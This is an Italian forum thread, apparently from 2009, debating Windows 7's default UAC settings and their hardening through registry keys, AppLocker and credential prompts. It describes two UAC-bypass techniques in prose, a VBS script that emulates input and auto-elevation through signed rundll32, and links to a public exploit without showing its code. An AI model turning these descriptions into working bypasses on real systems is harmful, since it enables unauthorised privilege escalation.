La gente impari che se vuole la sicurezza anche contro questo trucchetto triviale della macro VBS in cui si fa uso degli input-events deve alzare il livello dell'UAC.
Il cambio di preferenze per essere sicuri DEVE sempre passare attraverso il controllo dell'admin. Immagina se ti cambiano il DNS o altro e tu non ti accorgi di nulla. Mi meraviglio che si siano svegliati adesso con tutto questo falso problema gli utenti.
Io avrei messo almeno un prompt di UAC per modificare le impostazioni relative a UAC...
lasciando così le cose, @default il sistema ha UAC attivato ma disattivarlo con tutti i problemi di sicurezza che comporta è un gioco da ragazzi.

Non c'è niente di anormale o di poco sicuro in questo... Il problema è semplicemente by design: se non fai controlli sulle impostazioni di sistema, limitandole agli Amministratori (e su Vista di default si è amministratori con la a minuscola e ridotti privilegi come sappiamo) sarà sempre possibile. Non esistono metodi per aggirare la cosa se non eliminare completamente la gestione degli input-event o blindarli (ma in tal caso vogliamo far comparire l'UAC anche solo per emulare la pressione di un tasto? E un programma che volesse cambiare temporaneamente la funzione del tasto destro del mouse ad esempio?).


Si ma non si vede l'utilità di una libreria che emuli gli input da tastiera o da mouse. Specialmente per un programma user mode che gira con privilegi limitati, questo non deve essere possibile.


Credo che sia tranquillamente realizzabile un banale trucco del genere anche su Linux e MacOSX, che non dovrebbero neanche loro avere protezione dagli input-event, ma come Vista offrono protezione solo nel contesto in cui vengono eseguiti (da sessione utente, root etc. ereditando perciò tali diritti), non ho al momento un Linux sottomano per provare ma ne sono quasi certo... anzi dovrebbero esistere dei tool freeware per automatizzare delle macro per gli input-event, a dimostrazione...
http://www.google.it/search?num=50&hl=it&safe=off&rlz=1I7GGLL_it&q=Linux+input+macro+recorder&meta=

Si ma quasi sicuramente servono i privilegi root per accedere al device file del mouse. Sono certo che puoi leggere le informazioni da root, non so se li puoi scrivere.

Una cosa che invidio di linux sono proprio i device file.

Anche se in Linux con la password di root puoi fare TUTTO, persino accedere alle strutture dati del kernel tramite /dev/mem...

Cmq al di là di questi meccanismi di protezione, che proteggono più il sistema che i dati dell'utente, qualsiasi script può cancellare il contenuto della cartella documenti dell'utente, e senza alcun bisogno di consenso, basta fare doppio click e via...

Io avrei messo almeno un prompt di UAC per modificare le impostazioni relative a UAC...
lasciando così le cose, @default il sistema ha UAC attivato ma disattivarlo con tutti i problemi di sicurezza che comporta è un gioco da ragazzi.
Sono d'accordo. Almeno per certe impostazioni critiche, anche se gli utonti hanno voluto meno UAC requester :rolleyes: e MS li ha accontentati, dovrebbe restare obbligatorio la comparsa dell'UAC.

Si ma non si vede l'utilità di una libreria che emuli gli input da tastiera o da mouse. Specialmente per un programma user mode che gira con privilegi limitati, questo non deve essere possibile.
Beh, è presente in tutti gli OS che io conosca... anche su AmigaOS si poteva fare 20 anni fa... l'utilità è automatizzare/customizzare gli input per esempio per programmi, o per mostrare un demo automatico "senza mani" ;) o anche solo per fare in modo che a determinati input events venga associata nel sistema un'azione predefinita. Deve essere presente un API per fare ciò... Senza non sarebbe nemmeno possibile usare i QuickLaunch buttons di HP, per esempio...

Si ma quasi sicuramente servono i privilegi root per accedere al device file del mouse. Sono certo che puoi leggere le informazioni da root, non so se li puoi scrivere.
Non penso proprio: dai uno sguardo alle varie utility per registrare ed eseguire macro di input events anche per Linux ed eseguite da utente: http://www.google.it/search?num=50&hl=it&safe=off&rlz=1I7GGLL_it&q=Linux+input+macro+recorder&meta=

Cmq al di là di questi meccanismi di protezione, che proteggono più il sistema che i dati dell'utente, qualsiasi script può cancellare il contenuto della cartella documenti dell'utente, e senza alcun bisogno di consenso, basta fare doppio click e via...
Infatti... svicolando leggermente il discorso faccio notare che IE7 in modalità protetta sfruttando gli IL dovrebbe se non erro impedire anche il "read-up" (quindi non consentire nemmeno la lettura, non solo la scrittura, per oggetti con diritti superiori) ma non ne sono certo al 100%.

Perché inutile ed insensata?

Per lo stesso motio per cui le impostazioni di default su nt 6.1 dell'uac sono inutili e fallate perché sono così e basta.

Beh, è presente in tutti gli OS che io conosca... anche su AmigaOS si poteva fare 20 anni fa... l'utilità è automatizzare/customizzare gli input per esempio per programmi, o per mostrare un demo automatico "senza mani" ;)


Non so se è presente su tutti gli OS e con quali modalità, cmq sarebbe meglio poter disabilitare queste HOOKS, perchè ripeto, sono pericolose.


Non penso proprio: dai uno sguardo alle varie utility per registrare ed eseguire macro di input events anche per Linux ed eseguite da utente: http://www.google.it/search?num=50&hl=it&safe=off&rlz=1I7GGLL_it&q=Linux+input+macro+recorder&meta=


Dovrei provare e vedere... il fatto è che appunto avendo Linux i device file puoi gestire i permessi come se fosse un file generico, questa è una gran cosa.


Infatti... svicolando leggermente il discorso faccio notare che IE7 in modalità protetta sfruttando gli IL dovrebbe se non erro impedire anche il "read-up" (quindi non consentire nemmeno la lettura, non solo la scrittura, per oggetti con diritti superiori) ma non ne sono certo al 100%.

No, IE7 a quanto avevo letto sul blog di Joanna Rutowska usa la policy No-Write-Up... d'altronde basta notare come sia possibile leggere i documenti nella propria cartella.

Se fai un file html nella tua cartella e provi ad aprirlo con IE è visibile.

Per lo stesso motio per cui le impostazioni di default su nt 6.1 dell'uac sono inutili e fallate perché sono così e basta.

Non esageriamo, non c'è solo o bianco o nero, ci sono anche le vie di mezzo, sinceramente non voglio credere che non ci sia una soluzione...

Ci vorrebbe un UAC hardware..ossia una chiavetta usb opportunamente "formattata" e "settata" dal sistema operativo per il nostro account in base ad un livello di protezione scelto.
In assenza di questa non sarà possibile fare alcuna modifica al sistema, eseguire applicazioni o script non sicuri e nemmeno cancellare files e cartelle.
In questo modo, rimuovendo tale pendrive, non ci sarà bisogno nemmeno di antivirus & company..il sistema senza fare alcuna richiesta bloccherà qualsiasi cosa tranne operazioni di semplice lettura.

Non so se è presente su tutti gli OS e con quali modalità, cmq sarebbe meglio poter disabilitare queste HOOKS, perchè ripeto, sono pericolose.
Beh... come principio di sicurezza un professionista semplicemente impedirebbe che possa anche solo entrare quel VBS, quindi le sicurezze vanno poste a monte. Che ci sia la possibilità di usare questi hooks a me sembra normale...

Dovrei provare e vedere... il fatto è che appunto avendo Linux i device file puoi gestire i permessi come se fosse un file generico, questa è una gran cosa.
Beh, non credo non si possa fare anche su sistemi Win con le ACL, anzi... è più complicato certo.


No, IE7 a quanto avevo letto sul blog di Joanna Rutowska usa la policy No-Write-Up... d'altronde basta notare come sia possibile leggere i documenti nella propria cartella.

Se fai un file html nella tua cartella e provi ad aprirlo con IE è visibile.
Sì, infatti, ma mi sono sempre chiesto se in quelle situazioni IE7 temporaneamente non cambi certe sue impostazioni di sicurezza e/o non abbia definito dei permessi speciali per quelle singole azioni... boh...

Ci vorrebbe un UAC hardware..ossia una chiavetta usb opportunamente "formattata" e "settata" dal sistema operativo per il nostro account in base ad un livello di protezione scelto.
In assenza di questa non sarà possibile fare alcuna modifica al sistema, eseguire applicazioni o script non sicuri e nemmeno cancellare files e cartelle.
In questo modo, rimuovendo tale pendrive, non ci sarà bisogno nemmeno di antivirus & company..il sistema senza fare alcuna richiesta bloccherà qualsiasi cosa tranne operazioni di semplice lettura.

Forse questo è un po' esagerato, alla gente gli da fastidio fare un click figuriamoci se gli si chiede di inserire una chiavetta usb per installare un programma. E se la perde?

Ci vorrebbe un UAC hardware..ossia una chiavetta usb opportunamente "formattata" e "settata" dal sistema operativo per il nostro account in base ad un livello di protezione scelto.
In assenza di questa non sarà possibile fare alcuna modifica al sistema, eseguire applicazioni o script non sicuri e nemmeno cancellare files e cartelle.
In questo modo, rimuovendo tale pendrive, non ci sarà bisogno nemmeno di antivirus & company..il sistema senza fare alcuna richiesta bloccherà qualsiasi cosa tranne operazioni di semplice lettura.

In realtà basta attivare quello che ho detto nelle 3 righe finali qui: http://www.hwupgrade.it/forum/showpost.php?p=26090274&postcount=147
Non esiste possibilità via software di simulare la pressione dei tasti ctrl+alt+canc dal momento che generano un interrupt HW indipendentemente dall'OS e dal software in esecuzione (ed esclusivamente se fisicamente vengono premuti quei tasti).

Ricopio qui un mio post che ho fatto nel thread di Windows 7:

Ho trovato una recensione di AppLocker, integrato in Windows 7 che consente di formare policy per consentire o meno l'esecuzione di determinate applicazioni/dll:

http://4sysops.com/archives/review-windows-7-applocker-part-1-overview/

Dipende dal servizio AppID di default disabilitato per sicurezza (dell'utente di non fare casini :D). Dicono che nella Beta1 non funzioni la DLL Enforcement Rule, ma il resto funziona infatti ho bloccato gli script, come questo che disattiva UAC ;).

http://img98.imageshack.us/img98/7839/win7applockerdl2.th.jpg (http://img98.imageshack.us/my.php?image=win7applockerdl2.jpg)

Con la DLL Enforcement Rule prevista si potranno disabilitare alcune DLL, e questo è incredibilmente ottimo :D.

Se Microsoft fornisse un insieme di regole di default Consenti/Nega per le DLL staremmo a cavallo e non ci sarebbe neanche questo complesso di inferiorità nei confronti di SELinux.

...è che finalmente c'è gente seria e competente a sviluppare Windows dal punto di vista qualitativo, non solo quantitativo come in passato... è solo questione di tempo e MinWin, Vista, Win 7 etc. sono tutti ottimi esempi di una nuova aria che tira nel settore sviluppo :cool:

...che se non ricordo male dovrebbe essere attivabile tramite questa chiave di registro:esatto, è quella chiave. puoi usare il .reg o il secpol.msc (quest'ultima opzione per tutte le versioni ad esclusione della home basic che se non ricordo male non ha il frontend per le policy)


Non esiste possibilità via software di simulare la pressione dei tasti ctrl+alt+canc dal momento che generano un interrupt HW indipendentemente dall'OS e dal software in esecuzione.
esatto, se non ricordo male c'è anche la policy per chiederne la pressione prima di ogni inserimento di ogni richeista uac (credo il massimo settaggio paranoico sia ctrl+alt+canc + secure desktop + uac con credenziali)

Perché inutile ed insensata?Perchè secondo me chiedere "vuoi consentire" mette meno in guardia l'utente che un prompt con richiesta di credenziali : o almeno spero..poi è vera anche l'obiezione contraria, ovvero che c'è anche chi non si fà troppe domande e manda i proprio dati quando lo avvisano via email di aver vinto 1mln di euro ;)

esatto, è quella chiave. si può usare anche secpol.msc per tutte le versioni ad esclusione della home basic (che se non ricordo male non ha il frontend per queste policy)
Sulla Home Premium non c'è secpol, per cui bisogna agire sul registro...

esatto, se non ricordo male c'è anche la policy per chiederne la pressione prima di ogni inserimento di ogni richeista uac (credo il massimo settaggio paranoico sia ctrl+alt+canc + secure desktop + uac con credenziali)
Più di così infatti non è umanamente concepibile, e non è sicuramente aggirabile senza un omino che pigia i tasti della tastiera ;)

Sulla Home Premium non c'è secpol, per cui bisogna agire sul registro...hai ragione, manca in entrambe le versioni home. Sarà che per me esiste solo la versione business..ma questo è un altro discorso :)

In realtà basta attivare quello che ho detto nelle 3 righe finali qui: http://www.hwupgrade.it/forum/showpost.php?p=26090274&postcount=147
Non esiste possibilità via software di simulare la pressione dei tasti ctrl+alt+canc dal momento che generano un interrupt HW indipendentemente dall'OS e dal software in esecuzione (ed esclusivamente se fisicamente vengono premuti quei tasti).
Ok..fatto!
Mi chiede user e password..ma non la pressione di ctrl-alt-canc.
Fatto anche il tweak dell'AppLocker.

CTRL+ALT+CANC dovrebbe essere valido solo per il login, non credo si abbini anche ad UAC.

D'altronde non ha senso se usate UAC con il Desktop Protetto... quella combinazione di tasti serviva proprio per evitare che script automatizzassero il login.

CTRL+ALT+CANC dovrebbe essere valido solo per il login, non credo si abbini anche ad UAC.

D'altronde non ha senso se usate UAC con il Desktop Protetto... quella combinazione di tasti serviva proprio per evitare che script automatizzassero il login.
Ok..recepito.
user e password me l'ha chiesto la prima volta e adesso non me lo chiede più.
C'è la possibilità che lo chieda ogni volta e non una volta per sessione ?

Per avere anche il 3-fingers-salute:
- scrivi netplwiz in Start
- alla pagina Avanzate attiva in basso la funzione apposita:

http://www.pctunerup.com/up/results/_200901/th_20090131131147_netplwiz.jpg (http://www.pctunerup.com/up/image.php?src=_200901/20090131131147_netplwiz.jpg)

È vero però come dice WarDuck: è solo per l'accesso.

D'altronde non ha senso se usate UAC con il Desktop Protetto... quella combinazione di tasti serviva proprio per evitare che script automatizzassero il login.Non fà una grinza..

user e password me l'ha chiesto la prima volta e adesso non me lo chiede più.
C'è la possibilità che lo chieda ogni volta e non una volta per sessione ?

Impossibile. Ti deve apparire sempre la richiesta password una volta che imposti:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
ConsentPromptBehaviorAdmin = 1

No, te la chiede sempre per azioni che chiamano l'UAC la password una volta impostata la chiave di registro che ho scritto.
L'ho impostata (la chiave)..ma mi ha chiesto user e password soltanto la prima volta..adesso non più (ho pure riavviato).
Ricontrollando il regedit ho notato che mi ha reimpostato la chiave a "2"..bisognerebbe capire chi l'ha modificata..quale opzione nel control panel.
Inoltre..ho impostato anche la rules per gli script (seguendo alla lettera il post poco sopra)..ma non blocca (a monte) il nostro famoso script che abbassa la protezione dell'UAC. :(

Ne approfitto per chiedervi : sapete se c'è modo per espandere di default la voce dettagli nel prompt di uac? Perchè è fastidioso dover cliccare sulle doppie freccine per vedere qual'è l'eseguibile che richiede piu' privilegi.

E l'analogo per il dialog di copia (vedere sempre la velocità senza dover cliccare tutte le volte)?

Si ma non si vede l'utilità di una libreria che emuli gli input da tastiera o da mouse. Specialmente per un programma user mode che gira con privilegi limitati, questo non deve essere possibile.Emulatori di "mouse e tastiera". Sono utilissimi per molti giochi.
Anche le tastiere con tasti programmabili necessitano di queste funzioni.

Ci vorrebbe un UAC hardware..ossia una chiavetta usb opportunamente "formattata" e "settata" dal sistema operativo per il nostro account in base ad un livello di protezione scelto.
In assenza di questa non sarà possibile fare alcuna modifica al sistema, eseguire applicazioni o script non sicuri e nemmeno cancellare files e cartelle.
In questo modo, rimuovendo tale pendrive, non ci sarà bisogno nemmeno di antivirus & company..il sistema senza fare alcuna richiesta bloccherà qualsiasi cosa tranne operazioni di semplice lettura.Si chiama Trusted Computing, prevede un chip sulla scheda madre con una chiave e l'inserimento di una password. Con questo sistema puoi eseguire solo programmi in una lista permessa, leggere solo i supporti in una lista(criptati dalla chiave), e far funzionare solo l'hardware autorizzato.

Ogni dispositivo dell'esercito degli Stati Uniti deve avere questo supporto.

Si chiama Trusted Computing, prevede un chip sulla scheda madre con una chiave e l'inserimento di una password. Con questo sistema puoi eseguire solo programmi in una lista permessa, leggere solo i supporti in una lista(criptati dalla chiave), e far funzionare solo l'hardware autorizzato.

Ogni dispositivo dell'esercito degli Stati Uniti deve avere questo supporto.
Così..a rigor di logica mi sembrava il sistema più sicuro..o giù di lì. :D

In realtà basta attivare quello che ho detto nelle 3 righe finali qui: http://www.hwupgrade.it/forum/showpost.php?p=26090274&postcount=147
Non esiste possibilità via software di simulare la pressione dei tasti ctrl+alt+canc dal momento che generano un interrupt HW indipendentemente dall'OS e dal software in esecuzione (ed esclusivamente se fisicamente vengono premuti quei tasti).Non che non ti creda, ma ho provato a simularli premento il tasto Y con Xpadder ed effettivamente non succede nulla! :D

L'unica è addestrare l'utente ad usare un account standard... apparirà comunque UAC se non sbaglio.

Il punto sarebbe creare un utente amministratore che apparirà però nella schermata iniziale... :rolleyes: Dovrebbero fare un modo per impostare alcuni utenti non visualizzabili.


Tralaltro, ho appena creato un altro utente(e già cancellato... sono l'unico utente e non voglio doverlo scegliere):
Un utente standard non può selezionare i due livelli inferiori di UAC, quindi lo script non funzionerà comunque...
Appare anche solo spostando il livello di sicurezza dal 3 al 4, una finestra di UAC ma senza oscurire lo schermo, con tutto ancora interagibile...
...però Xpadder non funziona comunque.
Passando dal livello 4 al 3 invece passa visibilmente al desktop sicuro.

L'unica è addestrare l'utente ad usare un account standard... apparirà comunque UAC se non sbaglio.

Il punto sarebbe creare un utente amministratore che apparirà però nella schermata iniziale... :rolleyes: Dovrebbero fare un modo per impostare alcuni utenti non visualizzabili.


C'è il modo, sempre tramite registro, prova così:
http://triponic.com/guidestutorials/computer/how-to-make-an-invisible-user-account-in-vista/

Ma non c'è un account administrator nascosto di default? Io mi ricordavo di sì :confused:

Il problema è che durante l'installazione non viene chiesta una password per questo account administrator, e l'installer prosegue creando un altro account con i privilegi di amministratore (sebbene mi pare siano leggermente più limitati rispetto all'administrator nascosto, che di fatto è all'incirca l'equivalente di root per i sistemi Unix).

Penso che imporre in fase di setup una password per l'administrator e creare di default un utente limitato potrebbe essere una soluzione.

In questo modo l'UAC chiederebbe, come già fa oggi con gli utenti limitati, la password dell'administrator nei prompt. Così penso sarebbe davvero una sorta (ripeto, una sorta, ovvio che siano diversi) di sudo by Windows :D

Certo, se uno se la canta e se la suona da solo sul computer, eventualmente si eleva poi il suo username direttamente ad amministratore, e se si sente bravo ed esperto col PC, potrà anche disfarsi dell'UAC e fare ciò che gli aggrada senza prompt e password.

Ma in un ambiente multiutente, che può essere anche una famiglia, la soluzione di default penso dovrebbe essere quella che ho descritto :)

Bisogna distinguere dall'Administrator che crea l'installer di Windows (limitato) e il SuperAdministrator nascosto di default (e disattivato).

Essendo il SuperAdministrator disattivato di default, non ti viene chiesta la password durante l'installazione.

Cmq associando un programma del genere (modificando la voce "HKEY_CLASSES\cmdfile" del registro) a tutti i tipi di script si può fare in modo di chiedere all'utente il consenso anche per gli script in modalità utente, un po' come fa linux che ti chiede se vuoi eseguire lo script o aprirlo nell'editor per vedere cosa fa:

#include <conio.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

#define EDITOR "C:\\Windows\\Notepad.exe"

int main(int argc, char* argv[])
{
printf("ScriptBlock Chooser v0.1\n2009\n\n");

if (argc < 1) {
printf("Argument not provided.\n");
return -1;
}

printf("%s %s \n%s\n", "Trying to open", argv[1], "Select an action or press any key to cancel:");

printf("1. Open the script in NOTEPAD\n");
printf("2. Execute the script\n");

int c = getch();

switch(c) {
case '1': argv[0]=EDITOR; execve(EDITOR, argv, NULL); break;
case '2': system(argv[1]); break;
}

return 0;
}

(il programma in questione funziona via console, ma si può facilmente portare in C# con una GUI apposita)

PS: il programma in questione non funziona se c'è un altro eseguibile che chiama appunto il file cmd, per cui rimane più efficacie bloccare gli script tramite AppLocker.

Il punto è che un'exe maligno sfruttando le stesse librerie può in ogni caso emulare l'input da tastiera, capite perché è un problema?

Cioé, aspetta, non ho capito bene...

L'installer mi crea l'utente floola, ad esempio, con i privilegi di amministratore, poi c'è l'account administrator che, di fatto, è un SuperAdministrator quanto a privilegi, dunque una sorta di root per Windows, ed è disabilitato di default. Ho capito bene? :stordita:

Se ho capito bene, allora potrebbe andare bene come avevo detto, riformulandolo meglio: rendere il SuperAdministrator attivo, ma non visibile di default alla schermata di login e protetto con password creata durante l'installazione, e creare di default un utente limitato...

Cioé, aspetta, non ho capito bene...

L'installer mi crea l'utente floola, ad esempio, con i privilegi di amministratore, poi c'è l'account administrator che, di fatto, è un SuperAdministrator quanto a privilegi, dunque una sorta di root per Windows, ed è disabilitato di default. Ho capito bene? :stordita:


Esattamente. Lo puoi vedere cliccando col destro su Computer -> Manage, poi vai su Local Users and Groups -> Users, c'è l'elenco degli utenti del pc, e vedi che Administrator è disattivato di default.

Esattamente. Lo puoi vedere cliccando col destro su Computer -> Manage, poi vai su Local Users and Groups -> Users, c'è l'elenco degli utenti del pc, e vedi che Administrator è disattivato di default.

Ok, io pensavo fosse solo reso nascosto agli altri utenti, non che fosse proprio disattivato, non si finisce mai di scoprire cose nuove ;)

Non è esatto...

Administrator è un account che normalmente puoi usare solo in modalità provvisoria. Poi mi sembra si possa attivarlo anche normalmente... o forse no, forse la soluzione era creare un amministratore che si chiama Adiministrator... :D


Resta il fatto che con quel modo, posso sì creare un amministratore... Ma UAC continua a dare il mio nome, nonostante sia diventato utente standard, come opzione da cliccare... La cosa è strana.

Stavo pensando di farlo al portatile di mia sorella.

Oh, perfetto! Riavviando non posso scegliere alcun utente in UAC e quindi neppure modificare la chiave di registro, UAC o ripristinare lo stato di amministratore... :cry:

Oh, perfetto! Riavviando non posso scegliere alcun utente in UAC e quindi neppure modificare la chiave di registro, UAC o ripristinare lo stato di amministratore... :cry:non garantisco che tu possa risolvere con questa prova..però non costa nulla tentare : scarica PCLoginNow (http://www.pcloginnow.com/) (è un'iso bootabile da masterizzare) : lo scopo principale di questa mini-distro è quello di impostare o azzerare le password di xp/vista (sia su fat32 che ntfs) tuttavia non ricordo se permette anche di creare utenti da zero ed assegnarli a gruppi. puoi provare a vedere se puoi creare un'utente da aggiungere al gruppo administrators :stordita:

MANCO IL RIPRISTINO!!!!! :muro:

[SERIE DI PAROLE NON RIPRODUCIBILI]

[Aggiornamento: ripristinato il sistema a questa mattina avviando con F8 e selezionando la prima opzione(strumenti di recupero... qualcosa del genere ma in inglese).
Ti fa scegliere l'utente con cui connetterti, e tra questi c'era il mio amministratore e $AlphaUser (esattamente così). Il ripristino ha cancellato automaticamente l'account nuovo e ripristinato il mio....]

In realtà non è una "falla", ma l'ovvia conseguenza del design di default dell'UAC in Win7.
Ovvio, e l'ho sempre detto e scritto anche in questo forum che su Win7 va impostato come era su Vista l'UAC (http://www.hwupgrade.it/forum/showthread.php?p=25342798#post25342798) per stare sicuri: al massimo livello. Non quello di default anti-rottura® per far contenti gli ignoranti abituati a 7 anni di XP e che "non vogliono essere disturbati" poverini.... :rolleyes:
Io sono felice che il sistema mi chieda, quando voglio cambiare impostazioni, il permesso di amministratore.

quoto in toto: UAC al massimo se usi il pc come strumento di lavoro e non come macchina da gioco soltanto, poi di Seven comunque ti rimane la leggerezza che ti permette di usarlo anche su macchinette tipo EEpc ecc.

Non è esatto...

Administrator è un account che normalmente puoi usare solo in modalità provvisoria. Poi mi sembra si possa attivarlo anche normalmente... o forse no, forse la soluzione era creare un amministratore che si chiama Adiministrator... :D


Vabbé, ma la parte che mi interessava era quella :asd: Lo so che compare in modalità provvisoria. E sì, c'è il modo per attivarlo normalmente (ai tempi di XP, una volta, mi pare di averlo pure fatto...)

Non è una falla nella beta, è un errore di progettazione. A meno che non si cambi prima dell'uscita non la puoi correggere.
E comunque basta far agire la modifica dell'UAC come un programma "non Microsoft" e quindi apparire il desktop.

ma vi rendete conto di quello che scrivete???

ERRORE DI PROGETTAZIONE!!!!

è come dire finita una casa.... ci siamo dimenticati di fare il WC


la microsoft sborsa miliardi di dollari per la progettazione di un SO e mi dite che è un errore di progettazione.....

ma scherzate voi o gli ingegneri che stanno alla redmond???

I permessi NTFS sono così tanti e variegati che praticamente alla fine ci vogliono i permessi dei permessi dei permessi per fare un qualcosa dove in realtà sarebbe bastato un click senza rischi di autorizzare ciò che si era pensato di negare..una struttura tanto inutilmente complesa..

ROTFL, tu si che ne sai a pacchi.
Grazie al cazzo che diventano complessi se devi condividere due canzoni (che poi denoti ingnoranza dicendo questo perchè esistono scorciatoie che semplificano molto anche la condivisione casalinga), il punto è quanto diventano utili e dalle infinite possibilità in altri scenari.
Mai provato ad usare le ACL di Windows con una struttura complessa come AD vero?
No, altrimenti ti accorgeresti della vaccata cosmica che hai detto.

I sistemi Unix solo nel non permettere l'assegnazione di diritti ai singoli utenti (ma solo al proprietario) mangiano polvere dalla gestione ACL di Windows. E il tutto senza bisogno di stare a scomodare la differenziazione tra sharing e NTFS permissions.

Questo è il limite di Microsoft, avere un parco di software e di utenti talmente vasto che quello che si conosce è davvero limitato, e quando la gente giugne a conclusioni di cose che non conosce nemmeno ecco i risultati.

ma vi rendete conto di quello che scrivete???

ERRORE DI PROGETTAZIONE!!!!

è come dire finita una casa.... ci siamo dimenticati di fare il WC


la microsoft sborsa miliardi di dollari per la progettazione di un SO e mi dite che è un errore di progettazione.....

ma scherzate voi o gli ingegneri che stanno alla redmond???

A quanto ho capito non è proprio un errore di progettazione, ma una cosa voluta in quanto la MS sa di questo problema, ma dice che l'ha fatto per garantire la giusta esperienza agli utenti.

In pratica con Vista tutti dicono che UAC è troppo invasivo, con Seven ha abbassato il livello di protezione e ora tutti si lamentano che è troppo basso.

...che se non ricordo male dovrebbe essere attivabile tramite questa chiave di registro:

Mah, basta spostare l'utente dal gruppo Administrators a quello Users, quindi abilitare l'utente Administrator (disabilitato di default) e impostargli una password.
Cosi, alla richiesta di elevazione privilegi verrà richiesto l'inserimento della password.

Hanno ragione invece. Non è una vulnerabilità e non ci si può fare niente.

Hanno ragione loro si, perchè non è un bug.
Hanno ragione loro a non volerlo fixare no, non mi pare sia cosi difficile levare il certificato che esclude la richiesta di elevazione privilegi per il pannello di settaggio dell'UAC.

Se ho capito bene, allora potrebbe andare bene come avevo detto, riformulandolo meglio: rendere il SuperAdministrator attivo, ma non visibile di default alla schermata di login e protetto con password creata durante l'installazione, e creare di default un utente limitato...

Eh, lo dico dai tempi di Vista, Microsoft dovrebbe creare questa serie di eventi post installazione (in fase di creazione utenti) e non rendere possibile la creazione di un utente senza assegnargli una password, con i seguenti passi:

Utente Administrator -> obbligo di inserire una password
Creazione utente che andrà a finire nel gruppo Users -> obbligo di inserire una password.

In questo modo l'utente lavora come User e per le operazioni amministrative visualizza l'UAC con la richiesta di inserimento password dell'utenza Administrator.

ma vi rendete conto di quello che scrivete???

ERRORE DI PROGETTAZIONE!!!!

è come dire finita una casa.... ci siamo dimenticati di fare il WC


la microsoft sborsa miliardi di dollari per la progettazione di un SO e mi dite che è un errore di progettazione.....

ma scherzate voi o gli ingegneri che stanno alla redmond???

ahaha mi ricordo il primo film di arale e dr. slump in cui costruiscono l'astronave e poi si fermano a pensare... in quel momento esclamo: <<vuoi vedere che nella loro perfetta astronave si sono dimenticati il cesso?!?>>... era proprio così :D

cmq qui non è la stessa cosa, non fate altro che criticare e sparare a casaccio, pure io installando 7 mi sono accorto che il uac era meno invadente del solito, pensando alla beta, poi ho guardato le opzioni e ho capito.. non ci vuole proprio il genio se ci sono arrivato io..

non fate altro che criticare e sparare a casaccio

Davvero eh... Qui non ci si deve guardare più dagli utenti poco smaliziati ma dai presunti smanettoni! Un pressappochismo ed una superficialità disarmante in ogni discussione ma con commenti definitivi e netti senza conoscere minimamente ciò ce si critica.

la microsoft sborsa miliardi di dollari per la progettazione di un SO e mi dite che è un errore di progettazione...Progetti di rendere meno sicuro un prodotto>Errore di progettazione.

Errore facilmente risolvibile, facendo in modo che per modificare UAC, UAC appaia indipendentemente dal livello di privilegi.


Non chiudere un buco perchè non te ne sei accorto > Non hai la sfera di cristallo.
APRIRE un buco perchè il muro è solidissimo > Se non posso dire che hai sbagliato, allora devo dire che sei un coglione.

Hanno ragione loro a non volerlo fixare no, non mi pare sia cosi difficile levare il certificato che esclude la richiesta di elevazione privilegi per il pannello di settaggio dell'UAC.

Infatti credo che tutti siano d'accordo affinché impostazioni critiche come UAC on/off necessitino SEMPRE di UAC, qualsiasi livello di protezione si scelga... Vedremo se MS ascolterà questa critica.
Domani cmq i lamer si lamenteranno perché scopriranno che le impostazioni di rete sono modificabili senza che compaia l'UAC quando si mantiene il livello di protezioni più basso di come era in Vista :asd:

Scoperta una seconda falla nello UAC di Win7:
http://www.neowin.net/news/main/09/02/04/windows-7-uac-has-a-second-flaw

una seconda falla di sicurezza nello UAC di Win7 permette a un'applicazione di terze parti di elevare se stessa ai privilegi di amministratore senza richiedere l'autorizzazione e senza che venga disabilitato lo UAC.

Cari utonti, avete stupidamente sempre chiesto di avere meno prompt? Ora ciapatelo in quel posto! :ciapet:

Win7's UAC sucks!
Vista's UAC rocks!

Se il primo per lo meno vedi finestre aprirsi da sole, in questo non vedi nulla...

Il punto è: questo sistema è stato provato? Oppure è solo una teoria?
Potrebbe apparire comunque UAC perchè le applicazioni credo che lancino il codice, non che lo eseguino...

Ah, e la modalità protetta di IE? Con la firma digitale e UAC al terzo livello, non esiste...

Il punto è: questo sistema è stato provato? Oppure è solo una teoria?

E' stato provato, qui c'è l'exploit pubblico
http://www.withinwindows.com/2009/02/04/windows-7-auto-elevation-mistake-lets-malware-elevate-freely-easily
sfrutta il fatto che rundll32.exe è firmato e quindi un'applicazione di terze parti può usarlo per eseguire codice con privilegi elevati senza che lo UAC di Win7 intervenga.

Il punto della questione è che in Win7 hanno aperto la superficie di attacco pur di accontentare gli utonti, quindi in futuro se ne vedranno delle belle... Si assisterà alla scoperta di nuove falle che colpiranno gli utenti di Win7 e non gli utenti di Vista.

Win7's UAC sucks!
Vista's UAC rocks!
LOL :D ..e aggiungerei che (il maltrattato) VISTA è una roccia!

THE CAKE IS A LIE!!! AHAAHAHAH

E a leggere il codice, c'è scritto nel caso di livello di sistema, il nome della finestra è "Cheater, hai usato noclip per trovare la torta!" XD

Si assisterà alla scoperta di nuove falle che colpiranno gli utenti di Win7 che tengono UAC alle impostazioni di default e non gli utenti di Vista.
*

E tutta la gente dirà che é meglio Vista! :D

Win7 è in realtà Vista Utonto Edition :D, una edizione espressamente richiesta dagli utonti che non hanno saputo capire il perchè certe cose in Vista sono state fatte in un modo e non in un altro.

Basti anche solo pensare al defrag in Win7 che ora mostra la percentuale di frammentazione e altre informazioni direttamente dalla finestra, nonostante sia inutile mostrarlo, dato che il bello della deframmentazione automatica è il non doversene preoccupare, il non dover stare a perdere tempo a guardare continuamente a che punto è... Quindi il defrag di Win7 è un altro esempio di come hanno accontentato gli utonti, pur sapendo che quello di Vista era già la soluzione migliore.

Win7 è in realtà Vista Utonto Edition :D, una edizione espressamente richiesta dagli utonti che non hanno saputo capire il perchè certe cose in Vista sono state fatte in un modo e non in un altro.

Basti anche solo pensare al defrag in Win7 che ora mostra la percentuale di frammentazione e altre informazioni direttamente dalla finestra, nonostante sia inutile mostrarlo, dato che il bello della deframmentazione automatica è il non doversene preoccupare, il non dover stare a perdere tempo a guardare continuamente a che punto è... Quindi il defrag di Win7 è un altro esempio di come hanno accontentato gli utonti, pur sapendo che quello di Vista era già la soluzione migliore.

Quoto.
Anche se però è innegabile che Seven sia frutto di una profonda ottimizzazione di Vista e di conseguenza risulti essere più reattivo ed immediato. Anche l'interfaccia risulta essere più intuitiva e meno rindondante (vedi ad es. la gestione delle reti in Vista) .

ecco il frutto delle troppe lamentele il l'ho sempre detto il vero virus è l'utente :D

